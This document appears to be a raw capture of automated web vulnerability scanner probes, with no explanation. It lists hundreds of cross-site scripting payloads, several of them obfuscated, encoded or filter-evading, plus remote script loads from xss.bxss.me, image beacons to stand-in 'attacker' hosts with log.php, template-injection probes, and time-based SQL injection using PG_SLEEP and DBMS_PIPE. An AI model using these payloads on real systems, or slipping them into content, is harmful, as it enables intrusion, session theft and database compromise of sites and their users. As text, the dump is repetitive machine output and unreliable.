1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

555

<a HrEF=jaVaScRiPT:>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9059.com></IfRamE>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ifRAme sRc=9431.com></IfRamE>

555<img/src=">" onerror=alert(9402)>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

5554Q6sqxH4') OR 956=(SELECT 956 FROM PG_SLEEP(15))--

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

555

555}body{zzz:Expre/**/SSion(8zp8(9209))}

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

555<aoEydnP x=9321>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%7A%47%42%289316%29%3C%2F%73%43%72%69%70%54%3E

555<aMCRTr2 x=9349>

555

555cTSiO4Bj')) OR 686=(SELECT 686 FROM PG_SLEEP(15))--

555

dfb__${98991*97996}__::.x

555

dfb__${98991*97996}__::.x

555<ScRiPt >h6X5(9193)</ScRiPt>

555<ScRiPt >DOoH(9530)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScRiPt >mvgj(9940)</ScRiPt>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<img sRc='http://attacker-9508/log.php?

dfb{{98991*97996}}xca

555Kj5vn <ScRiPt >8zp8(9003)</ScRiPt>

555<ScRiPt >fap8(9328)</ScRiPt>

555<img sRc='http://attacker-9360/log.php?

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\gzGB(9700)\u003C/sCripT\u003E

555<WUSNRM>RFXJU[!+!]</WUSNRM>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

555<WXSKOG>V6QAH[!+!]</WXSKOG>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<WRJSYB>BP18E[!+!]</WRJSYB>

dfb[[${98991*97996}]]xca

555<WLOSXY>4CD5S[!+!]</WLOSXY>

555<aGewb6n<

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

555<script>DOoH(9229)</script>

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555<ScRiPt >zOnC(9210)</ScRiPt>

555<script>mvgj(9437)</script>

555<ScRiPt >vv90(9003)</ScRiPt>

555'"

555<ScRiPt >hjYA(9930)</ScRiPt>

555<script>h6X5(9676)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<aeCBuMO<

555<WKW9YK>PJLJN[!+!]</WKW9YK>

555&lt

dfb{{98991*97996}}xca

555\xc0\xa7\xc0\xa2%2527%2522\'\"

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<script>DOoH(9310)</script>9310

555'"()&%<zzz><ScRiPt >v1wz(9202)</ScRiPt>

@@kOmm7

555'"()&%<zzz><ScRiPt >BvY8(9876)</ScRiPt>

555<script>fap8(9593)</script>

555<W85YAA>SAS2P[!+!]</W85YAA>

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555'"()&%<zzz><ScRiPt >7Pbf(9265)</ScRiPt>

555'"()&%<zzz><ScRiPt >jpLh(9171)</ScRiPt>

555'"()&%<zzz><ScRiPt >zqvf(9054)</ScRiPt>

555<ifRAme sRc=9281.com></IfRamE>

555<ScRiPt >LF4H(9352)</ScRiPt>

555<WA0JHH>WGEMX[!+!]</WA0JHH>

555<script>mvgj(9195)</script>9195

555<WXJEMZ>VY49A[!+!]</WXJEMZ>

555<script>h6X5(9686)</script>9686

555<script>vv90(9713)</script>

\xf6<img zzz onmouseover=gzGB(94751) //\xf6>

'"()&%<zzz><ScRiPt >BvY8(9949)</ScRiPt>

555<script>fap8(9779)</script>9779

555'"()&%<zzz><ScRiPt >fN18(9439)</ScRiPt>

555<ScRiPt >nX3f(9845)</ScRiPt>

'"()&%<zzz><ScRiPt >7Pbf(9829)</ScRiPt>

'"()&%<zzz><ScRiPt >zqvf(9166)</ScRiPt>

555<ScR<ScRiPt>IpT>mvgj(9783)</sCr<ScRiPt>IpT>

555<script>zOnC(9764)</script>

555<aoyn8lV x=9573>

555<ScR<ScRiPt>IpT>h6X5(9530)</sCr<ScRiPt>IpT>

555<script>vv90(9619)</script>9619

555<ScR<ScRiPt>IpT>DOoH(9982)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >v1wz(9125)</ScRiPt>

'"()&%<zzz><ScRiPt >jpLh(9304)</ScRiPt>

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>fap8(9752)</sCr<ScRiPt>IpT>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

5559223422

555<img sRc='http://attacker-9130/log.php?

555<input autofocus onfocus=gzGB(9935)>

555

555<script>hjYA(9447)</script>

555<WWD1AZ>FPSIJ[!+!]</WWD1AZ>

'"()&%<zzz><ScRiPt >fN18(9230)</ScRiPt>

555<ScRiPt >mKVZ(9860)</ScRiPt>

5559125920

555<ScRiPt >mvgj(9695)</ScRiPt>

555<ScRiPt >h6X5(9432)</ScRiPt>

5559965983

555<script>zOnC(9572)</script>9572

555<ScRiPt >fap8(9746)</ScRiPt>

555<WKMD6F>ZVGBX[!+!]</WKMD6F>

555<ScR<ScRiPt>IpT>vv90(9544)</sCr<ScRiPt>IpT>

555<script>LF4H(9164)</script>

5559945614

5559851517

bfg5048\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5048

555'"()&%<zzz><ScRiPt >MttZ(9395)</ScRiPt>

555<ScRiPt >DOoH(9459)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9857></ScRiPt>

5559453483

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

555<WU2NVQ>YQLLO[!+!]</WU2NVQ>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9768></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9191></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9603></ScRiPt>

555<aBtIlzC<

555<ScRiPt >mvgj(9532)</ScRiPt>

bfg9740\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9740

bfgx3290\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3290

555<ScRiPt >vv90(9055)</ScRiPt>

555<ScRiPt >sEMM(9884)</ScRiPt>

555<script>LF4H(9544)</script>9544

555<ScR<ScRiPt>IpT>zOnC(9310)</sCr<ScRiPt>IpT>

bfg8856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8856

bfg8815\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8815

555<script>hjYA(9516)</script>9516

bfg8367\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8367

'"()&%<zzz><ScRiPt >MttZ(9653)</ScRiPt>

555<script>nX3f(9941)</script>

<%={{={@{#{${dfb}}%>

bfg3317\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3317

555<script>mKVZ(9468)</script>

555<svg  \xa0onload=mvgj(9971)

555<ScRiPt >DOoH(9900)</ScRiPt>

555'"()&%<zzz><ScRiPt >xNzV(9080)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<ScR<ScRiPt>IpT>hjYA(9861)</sCr<ScRiPt>IpT>

bfgx9224\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9224

555

555<ScRiPt >h6X5(9731)</ScRiPt>

555

555<script>mKVZ(9791)</script>9791

555<ScRiPt >zOnC(9437)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9238></ScRiPt>

555<W998LF>FUAFC[!+!]</W998LF>

bfgx6151\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6151

bfgx10334\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10334

555<script>nX3f(9294)</script>9294

bfgx1611\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1611

555<ScRiPt >fap8(9756)</ScRiPt>

555<ScR<ScRiPt>IpT>LF4H(9355)</sCr<ScRiPt>IpT>

555<svg  \xa0onload=DOoH(9523)

5559044589

555<ScR<ScRiPt>IpT>mKVZ(9990)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >xNzV(9804)</ScRiPt>

555<ScRiPt >hjYA(9903)</ScRiPt>

bfgx3868\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3868

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=mvgj(9445)>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>nX3f(9965)</sCr<ScRiPt>IpT>

555<ScRiPt >LF4H(9856)</ScRiPt>

555<svg  \xa0onload=h6X5(9446)

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555<ScRiPt >vv90(9766)</ScRiPt>

555}body{zzz:Expre/**/SSion(gzGB(9980))}

555

<%={{={@{#{${dfb}}%>

5559846268

bfg5094\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5094

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9705></ScRiPt>

555<script>sEMM(9245)</script>

555<ScRiPt >mKVZ(9547)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9628></ScRiPt>

555

555<svg  \xa0onload=fap8(9515)

555

555

bfg5054\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5054

555<isindex type=image src=1 onerror=DOoH(9671)>

555

555<ScRiPt >hjYA(9981)</ScRiPt>

555

555<svg  \xa0onload=vv90(9173)

555<iframe src='data:text/html

555<ScRiPt >nX3f(9884)</ScRiPt>

555

555<script>sEMM(9321)</script>9321

555<isindex type=image src=1 onerror=h6X5(9583)>

555<isindex type=image src=1 onerror=fap8(9160)>

<th:t="${dfb}#foreach

bfgx8253\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8253

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555HbBQ8 <ScRiPt >gzGB(9588)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9060></ScRiPt>

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9238></ScRiPt>

bfgx2606\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2606

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9693></ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555<ScRiPt >zOnC(9544)</ScRiPt>

555

<th:t="${dfb}#foreach

555<svg  \xa0onload=hjYA(9764)

555<WUNPRP>GXDHV[!+!]</WUNPRP>

555

555

555<iframe src='data:text/html

555

555<iframe src='data:text/html

555<ScRiPt >mKVZ(9249)</ScRiPt>

555

555<body onload=DOoH(9651)>

555

<%={{={@{#{${dfb}}%>

555<body onload=mvgj(9025)>

555<isindex type=image src=1 onerror=vv90(9983)>

555<ScR<ScRiPt>IpT>sEMM(9193)</sCr<ScRiPt>IpT>

555

<%={{={@{#{${dfb}}%>

555<svg  \xa0onload=zOnC(9755)

555<body onload=h6X5(9353)>

555<ScRiPt >LF4H(9830)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >nX3f(9397)</ScRiPt>

555

555

555

555

555<body onload=fap8(9072)>

555<svg  \xa0onload=mKVZ(9787)

dfb{{98991*97996}}xca

555

555<ifRAme sRc=9098.com></IfRamE>

555<isindex type=image src=1 onerror=zOnC(9323)>

555<isindex type=image src=1 onerror=hjYA(9494)>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555

555<svg  \xa0onload=LF4H(9704)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=DOoH(9846)>

555<svg  \xa0onload=nX3f(9542)

555<img src=//xss.bxss.me/t/dot.gif onload=h6X5(9437)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >sEMM(9354)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<img src=//xss.bxss.me/t/dot.gif onload=mvgj(9320)>

555<iframe src='data:text/html

555

555<isindex type=image src=1 onerror=mKVZ(9436)>

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=fap8(9643)>

555<iframe src='data:text/html

555

555

555

555

555<amc3cqI x=9600>

555<img src=xyz OnErRor=h6X5(9427)>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=DOoH(9111)>

555<isindex type=image src=1 onerror=LF4H(9859)>

555<isindex type=image src=1 onerror=nX3f(9245)>

<th:t="${dfb}#foreach

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=fap8(9749)>

555

555

555<body onload=vv90(9917)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9165></ScRiPt>

dfb[[${98991*97996}]]xca

555<body onload=zOnC(9575)>

<th:t="${dfb}#foreach

555<img/src=">" onerror=alert(9929)>

555<img src=xyz OnErRor=mvgj(9890)>

555<img sRc='http://attacker-9886/log.php?

555<body onload=hjYA(9328)>

555<iframe src='data:text/html

555<img/src=">" onerror=alert(9377)>

555<img/src=">" onerror=alert(9271)>

555<iframe src='data:text/html

555<iframe src='data:text/html

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<body onload=mKVZ(9637)>

555<img src=//xss.bxss.me/t/dot.gif onload=hjYA(9423)>

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%68%36%58%35%289674%29%3C%2F%73%43%72%69%70%54%3E

555<img/src=">" onerror=alert(9124)>

555<ScRiPt >sEMM(9087)</ScRiPt>

555

555

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=nX3f(9290)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%61%70%38%289814%29%3C%2F%73%43%72%69%70%54%3E

555<aFV9jjO<

555<img src=//xss.bxss.me/t/dot.gif onload=vv90(9330)>

555\u003CScRiPt\fap8(9234)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=zOnC(9312)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%76%67%6A%289330%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >7Pbf(9985)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=mKVZ(9278)>

dfb[[${98991*97996}]]xca

555<body onload=LF4H(9106)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%4F%6F%48%289576%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=nX3f(9558)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

dfb[[${98991*97996}]]xca

555<svg  \xa0onload=sEMM(9423)

555<img src=xyz OnErRor=hjYA(9056)>

dfb__${98991*97996}__::.x

555\u003CScRiPt\h6X5(9763)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

555<img/src=">" onerror=alert(9545)>

555&lt

555<WI1M8X>IV2D9[!+!]</WI1M8X>

555<img src=xyz OnErRor=mKVZ(9565)>

555<img src=//xss.bxss.me/t/dot.gif onload=LF4H(9182)>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555\u003CScRiPt\DOoH(9153)\u003C/sCripT\u003E

555<img src=xyz OnErRor=zOnC(9015)>

555&lt

555<img src=xyz OnErRor=nX3f(9594)>

dfb__${98991*97996}__::.x

555\u003CScRiPt\mvgj(9895)\u003C/sCripT\u003E

555<img src=xyz OnErRor=vv90(9244)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%68%6A%59%41%289306%29%3C%2F%73%43%72%69%70%54%3E

555

555<img/src=">" onerror=alert(9222)>

555

555<isindex type=image src=1 onerror=sEMM(9027)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=xyz OnErRor=LF4H(9356)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9075)>

555<script>7Pbf(9665)</script>

555

555<ScRiPt >BvY8(9093)</ScRiPt>

555\u003CScRiPt\hjYA(9991)\u003C/sCripT\u003E

dfb{{98991*97996}}xca

555&lt

\xf6<img zzz onmouseover=fap8(91821) //\xf6>

555<img/src=">" onerror=alert(9530)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%4B%56%5A%289164%29%3C%2F%73%43%72%69%70%54%3E

555<img/src=">" onerror=alert(9963)>

\xf6<img zzz onmouseover=h6X5(98961) //\xf6>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%4F%6E%43%289149%29%3C%2F%73%43%72%69%70%54%3E

555<script>7Pbf(9286)</script>9286

555&lt

555<img/src=">" onerror=alert(9399)>

555<ScRiPt >jpLh(9419)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%76%76%39%30%289910%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >v1wz(9832)</ScRiPt>

555<ScRiPt >zqvf(9331)</ScRiPt>

dfb[[${98991*97996}]]xca

555

555<ScRiPt >fN18(9309)</ScRiPt>

555&lt

%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%58%33%66%289461%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

555<input autofocus onfocus=fap8(9739)>

555<WVNLAK>L8ZBE[!+!]</WVNLAK>

555<input autofocus onfocus=h6X5(9356)>

555<iframe src='data:text/html

\xf6<img zzz onmouseover=DOoH(98481) //\xf6>

555\u003CScRiPt\mKVZ(9861)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%4C%46%34%48%289185%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=mvgj(90241) //\xf6>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555\u003CScRiPt\vv90(9092)\u003C/sCripT\u003E

555<WRBA1C>JYBPF[!+!]</WRBA1C>

555<WTW9ZD>QRWDI[!+!]</WTW9ZD>

555<WCPMJQ>BVQGS[!+!]</WCPMJQ>

\xf6<img zzz onmouseover=hjYA(90521) //\xf6>

555\u003CScRiPt\nX3f(9146)\u003C/sCripT\u003E

555<input autofocus onfocus=DOoH(9960)>

555\u003CScRiPt\LF4H(9229)\u003C/sCripT\u003E

555&lt

<a HrEF=http://xss.bxss.me></a>

555<WGL5TB>F0RBZ[!+!]</WGL5TB>

555<ScR<ScRiPt>IpT>7Pbf(9588)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<script>BvY8(9031)</script>

555\u003CScRiPt\zOnC(9398)\u003C/sCripT\u003E

555&lt

555

555<script>zqvf(9198)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

555&lt

555<body onload=sEMM(9143)>

555<input autofocus onfocus=mvgj(9591)>

555<script>jpLh(9371)</script>

555<script>fN18(9256)</script>

<a HrEF=jaVaScRiPT:>

555&lt

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=jaVaScRiPT:>

555<script>v1wz(9071)</script>

555<input autofocus onfocus=hjYA(9506)>

555<script>jpLh(9229)</script>9229

\xf6<img zzz onmouseover=mKVZ(97351) //\xf6>

<a HrEF=http://xss.bxss.me></a>

555<script>BvY8(9398)</script>9398

555<script>zqvf(9360)</script>9360

<a HrEF=jaVaScRiPT:>

555<img src=//xss.bxss.me/t/dot.gif onload=sEMM(9957)>

555

\xf6<img zzz onmouseover=nX3f(92111) //\xf6>

555}body{zzz:Expre/**/SSion(h6X5(9007))}

555<ScRiPt >MttZ(9093)</ScRiPt>

555<ScRiPt >7Pbf(9869)</ScRiPt>

555<ScRiPt >xNzV(9691)</ScRiPt>

555}body{zzz:Expre/**/SSion(fap8(9538))}

555&lt

555<script>fN18(9478)</script>9478

\xf6<img zzz onmouseover=vv90(92241) //\xf6>

<a HrEF=jaVaScRiPT:>

555

\xf6<img zzz onmouseover=LF4H(92441) //\xf6>

555<ScR<ScRiPt>IpT>BvY8(9658)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>jpLh(9841)</sCr<ScRiPt>IpT>

555<WD58RP>DR2BD[!+!]</WD58RP>

555P889E <ScRiPt >fap8(9930)</ScRiPt>

555atXl8 <ScRiPt >h6X5(9099)</ScRiPt>

555

555<script>v1wz(9721)</script>9721

555<input autofocus onfocus=nX3f(9616)>

555<WNUOOJ>KSDMF[!+!]</WNUOOJ>

555<ScR<ScRiPt>IpT>zqvf(9625)</sCr<ScRiPt>IpT>

555<img src=xyz OnErRor=sEMM(9216)>

<a HrEF=http://xss.bxss.me></a>

555<WVA8MR>J6LIJ[!+!]</WVA8MR>

555<input autofocus onfocus=mKVZ(9798)>

555<ScRiPt >jpLh(9502)</ScRiPt>

555<ScRiPt >BvY8(9447)</ScRiPt>

555<script>MttZ(9476)</script>

555

\xf6<img zzz onmouseover=zOnC(99651) //\xf6>

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=LF4H(9955)>

555<input autofocus onfocus=vv90(9369)>

555}body{zzz:Expre/**/SSion(mvgj(9605))}

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9866></ScRiPt>

555}body{zzz:Expre/**/SSion(DOoH(9156))}

555<ScR<ScRiPt>IpT>v1wz(9406)</sCr<ScRiPt>IpT>

555<ScRiPt >zqvf(9507)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

555<script>MttZ(9164)</script>9164

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9316></ScRiPt>

555<script>xNzV(9817)</script>

555<WWO10M>T6DQT[!+!]</WWO10M>

555<img/src=">" onerror=alert(9148)>

555<input autofocus onfocus=zOnC(9413)>

555<ScR<ScRiPt>IpT>fN18(9618)</sCr<ScRiPt>IpT>

555<ScRiPt >7Pbf(9884)</ScRiPt>

55542dvs <ScRiPt >mvgj(9625)</ScRiPt>

555<ifRAme sRc=9026.com></IfRamE>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >v1wz(9249)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9586></ScRiPt>

555<ScRiPt >fN18(9370)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9180></ScRiPt>

555<script>xNzV(9184)</script>9184

<a HrEF=http://xss.bxss.me></a>

555<WZSYTE>D3KQN[!+!]</WZSYTE>

555<svg  \xa0onload=7Pbf(9667)

555<ScR<ScRiPt>IpT>MttZ(9963)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(hjYA(9358))}

555FbsaX <ScRiPt >DOoH(9126)</ScRiPt>

555<ScRiPt >BvY8(9185)</ScRiPt>

555<aZY8swA x=9851>

555<ifRAme sRc=9161.com></IfRamE>

555<ScRiPt >zqvf(9196)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(nX3f(9356))}

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9703></ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9248></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%45%4D%4D%289612%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9252.com></IfRamE>

555<a6ymujj x=9981>

555<svg  \xa0onload=BvY8(9964)

555JAY5S <ScRiPt >hjYA(9790)</ScRiPt>

555<ScR<ScRiPt>IpT>xNzV(9725)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(mKVZ(9360))}

555<img sRc='http://attacker-9421/log.php?

555<ScRiPt >MttZ(9420)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9885/log.php?

555<ScRiPt >v1wz(9102)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<svg  \xa0onload=zqvf(9162)

<a HrEF=jaVaScRiPT:>

555<ScRiPt >jpLh(9257)</ScRiPt>

555\u003CScRiPt\sEMM(9737)\u003C/sCripT\u003E

555<ScRiPt >fN18(9432)</ScRiPt>

555X86O1 <ScRiPt >mKVZ(9565)</ScRiPt>

555<isindex type=image src=1 onerror=BvY8(9343)>

555}body{zzz:Expre/**/SSion(LF4H(9632))}

555<isindex type=image src=1 onerror=7Pbf(9576)>

555<W9SPZF>U5MH9[!+!]</W9SPZF>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9026></ScRiPt>

555<WC6JXW>7YTDV[!+!]</WC6JXW>

555<a2WRofT<

555<svg  \xa0onload=v1wz(9138)

555<ajAFKBP x=9859>

5555DUJe <ScRiPt >LF4H(9782)</ScRiPt>

555}body{zzz:Expre/**/SSion(vv90(9905))}

555}body{zzz:Expre/**/SSion(zOnC(9860))}

555<aXzdvgz<

555<isindex type=image src=1 onerror=zqvf(9684)>

555u2pR5 <ScRiPt >nX3f(9040)</ScRiPt>

555<ScRiPt >xNzV(9437)</ScRiPt>

555<svg  \xa0onload=fN18(9979)

555<iframe src='data:text/html

555<isindex type=image src=1 onerror=v1wz(9750)>

555<ScRiPt >MttZ(9428)</ScRiPt>

555<svg  \xa0onload=jpLh(9438)

555cBL7Z <ScRiPt >zOnC(9577)</ScRiPt>

555<body onload=BvY8(9691)>

555<ifRAme sRc=9443.com></IfRamE>

555<iframe src='data:text/html

555<svg  \xa0onload=MttZ(9697)

555&lt

555ldZim <ScRiPt >vv90(9943)</ScRiPt>

555<WH83TQ>XH4LL[!+!]</WH83TQ>

555<iframe src='data:text/html

555<ifRAme sRc=9016.com></IfRamE>

555<iframe src='data:text/html

555<body onload=7Pbf(9382)>

555<img sRc='http://attacker-9533/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=BvY8(9702)>

555<WGXKAB>9H9X3[!+!]</WGXKAB>

555<isindex type=image src=1 onerror=jpLh(9166)>

\xf6<img zzz onmouseover=sEMM(91291) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9737></ScRiPt>

555<WX46MD>UCM4C[!+!]</WX46MD>

555<body onload=zqvf(9622)>

555<body onload=v1wz(9785)>

555<img src=//xss.bxss.me/t/dot.gif onload=7Pbf(9359)>

555<aXTlBvU x=9720>

555<isindex type=image src=1 onerror=fN18(9144)>

555<W0DCPK>RZNI4[!+!]</W0DCPK>

555<ifRAme sRc=9271.com></IfRamE>

555<azDDnWQ x=9432>

555<iframe src='data:text/html

555<isindex type=image src=1 onerror=MttZ(9994)>

555<W6MFK9>BHASB[!+!]</W6MFK9>

555<ahGcvyY<

555<input autofocus onfocus=sEMM(9521)>

555<img src=xyz OnErRor=7Pbf(9387)>

555<ifRAme sRc=9526.com></IfRamE>

555<aExv1LR x=9204>

555<ScRiPt >xNzV(9976)</ScRiPt>

555<ifRAme sRc=9763.com></IfRamE>

555<img src=//xss.bxss.me/t/dot.gif onload=zqvf(9654)>

555<body onload=jpLh(9893)>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<ifRAme sRc=9681.com></IfRamE>

555<img sRc='http://attacker-9931/log.php?

555<img sRc='http://attacker-9521/log.php?

555<img src=xyz OnErRor=BvY8(9101)>

555<img src=//xss.bxss.me/t/dot.gif onload=v1wz(9972)>

555<img/src=">" onerror=alert(9451)>

555<aA4wUZe x=9753>

555<ahgVESC x=9962>

555<img/src=">" onerror=alert(9060)>

555<aixDi6P x=9638>

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=zqvf(9929)>

555<svg  \xa0onload=xNzV(9783)

555<body onload=fN18(9724)>

555<afUqEFj<

555<ak2mdYx<

555<img src=//xss.bxss.me/t/dot.gif onload=jpLh(9799)>

555<img src=xyz OnErRor=v1wz(9866)>

555<img sRc='http://attacker-9870/log.php?

%35%35%35%3C%53%63%52%69%50%74%20%3E%42%76%59%38%289969%29%3C%2F%73%43%72%69%70%54%3E

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9242/log.php?

555<img sRc='http://attacker-9183/log.php?

555<body onload=MttZ(9288)>

555<aIjyWtZ<

555<img src=xyz OnErRor=jpLh(9687)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%37%50%62%66%289584%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=fN18(9121)>

555<isindex type=image src=1 onerror=xNzV(9041)>

555<img sRc='http://attacker-9686/log.php?

555<img/src=">" onerror=alert(9755)>

555<img/src=">" onerror=alert(9923)>

